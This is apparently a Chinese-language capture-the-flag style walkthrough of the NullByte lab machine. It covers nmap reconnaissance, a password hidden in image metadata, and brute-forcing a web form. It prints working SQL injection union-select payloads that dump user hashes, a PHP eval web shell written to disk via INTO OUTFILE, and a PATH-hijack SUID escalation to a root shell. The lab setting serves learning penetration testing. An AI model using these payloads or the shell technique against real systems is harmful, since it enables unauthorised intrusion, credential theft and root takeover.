靶机通关1--nullbytes

靶机通关1–nullbytes1.扫描靶机是否存活,并确定靶机ipsudo nmap -sn 192.168.85.0/242.扫描端口信息sudo nmap -min-rate 10000 -p- -oA nampscan/ports 靶机ip参数详细意思-min-rate [数字] 以最小速率n扫描-p 指定端口 -p- 表示扫描 1-65535端口-oA 将扫描结果以三种结果输出到指定位置可以看到 80,111,777,57394端口打开接着扫描它们的详细信息sudo nmap -sT -sV -sC -O -p80,111,777,57394 靶机ip-sT:以tcp方式扫描-sV:探测服务的版本-sC:默认脚本扫描-O:探测操作系统版本可以看到80端口运行http服务使用的apache,777端口是ssh服务(默认是22端口),111端口出现error报错信息显示nmap的rpcinfo脚本执行失败,57394端口与rpc服务相关111端口没扫出来,再试一遍这下扫出来了111端口的详细信息,也是rpc相关.之前使用了tcp方式扫描,rpc服务往往也与udp相关,所以也用udp扫一遍sudo nmap -sU -p80,111,777,57394 -oA nmapscan/udp 靶机ip-sU:以udp方式扫描111端口的udp开放接着扫描端口是否具有漏洞sudo nmap -scriptvuln -80,111,777,57394 -oA nmapscan/vuln 192.168.85.136-script:启动并执行相应脚本auth: 负责处理鉴权证书绕开鉴权的脚本broadcast: 在局域网内探查更多服务开启状况如dhcp/dns/sqlserver等服务brute: 提供暴力破解方式针对常见的应用如http/snmp等default: 使用-sC或-A选项扫描时候默认的脚本提供基本脚本扫描能力discovery: 对网络进行更多的信息如SMB枚举、SNMP查询等dos: 用于进行拒绝服务攻击exploit: 利用已知的漏洞入侵系统external: 利用第三方的数据库或资源例如进行whois解析fuzzer: 模糊测试的脚本发送异常的包到目标机探测出潜在漏洞 intrusive: 入侵性的脚本此类脚本可能引发对方的IDS/IPS的记录或屏蔽malware: 探测目标机是否感染了病毒、开启了后门等信息safe: 此类与intrusive相反属于安全性脚本version: 负责增强服务与版本扫描Version Detection功能的脚本vuln: 负责检查目标机是否有常见的漏洞Vulnerability如是否有MS08_067可以看到80端口找到了一个dos漏洞,无法利用,其他端口没找到漏洞,还在80端口下找到了/phpmyadmin,/uploads目录2.web渗透上面找到了一些目录,我们先访问一下靶机查看一下源码发现一个main.gif,下载下来看看既然是图片,那看看有没有隐写之类的看看格式对不对没问题再使用exiftool看看有没有隐藏信息comment这个字符串似乎有点可疑先试一下base64解码,解出乱码,再试试hashhash-identifier kzMb5nVYJw不是hash值那么就当是明文.整理一下手中的情报,我们扫描端口时得到各个端口的服务,扫描漏洞时找到了80端口下/phpmyadmin,/uploads目录,同时还通过浏览器访问靶机找到了一串 kzMb5nVYJw接着访问一下那些目录那么思考这串字符能在哪里使用,或者说可以在哪里输入第一,phpmyadmin的输入框第二,ssh登录第三,url发现是url看眼源码,告诉我们密码并不复杂,尝试暴力破解成功破解输入跳转到尝试输入一下发现查询数据的功能,试试能不能sql注入输入回显报错,很可能可以注入方法一 union select 1,2,3; # union select 1,user(),table_name from information_schema.tables where table_schemadatabase(); #发现users表 union select 1,user(),column_name from information_schema.columns where table_schemadatabase() and table_nameusers ; #查出字段名 union select 1,2,concat(user,,pass) from users; #得到了用户以及一段字符串base64解码c6d6bd7ebf806f43c76acc3681703b81是不是hash值是md5ssh成功登录方法二写入一句话密码 union select ?php eval($_POST[pass]);?,2,3 into outfile /var/www/html/uploads/shell1.php; #成功写入蚁剑连接一下试试成功那么接下来寻找重要的文件,想到sql注入那个界面存在数据交互,可能有重要文件找到420search文件找到数据库root用户与密码在phpmyadmin中登录进入数据库拿到用户与密码方法三反弹shll一直没成功,暂时搁置方法四sqlmap太简单了,不用写笔记了就3.SUID提权SUID:Set User ID— 特殊权限位允许用户以文件所有者的权限执行程序登录进入ramses用户后,进行信息搜集得知了用户的权限和能够操作(权限位为s,以文件所有者的权限执行程序)的文件注意到有backup文件,往往该文件下存有备份文件可能很有价值看到prowatch权限位s我这是第二次实验,所以已经创建了软连接,接下来把当前目录设为环境变量,再执行prowatch原理:我们创建了一个名为ps的软链接指向/bin/sh,并将当前目录设置在环境变量的最前面,这样我们在执行procwatch程序时,它会去调用ps,而当前目录最优先,调用了当前目录里的ps,也就是调用了/bin/sh,同时procwatch是以root权限调用的,所以我们也使用root权限打开了/bin/sh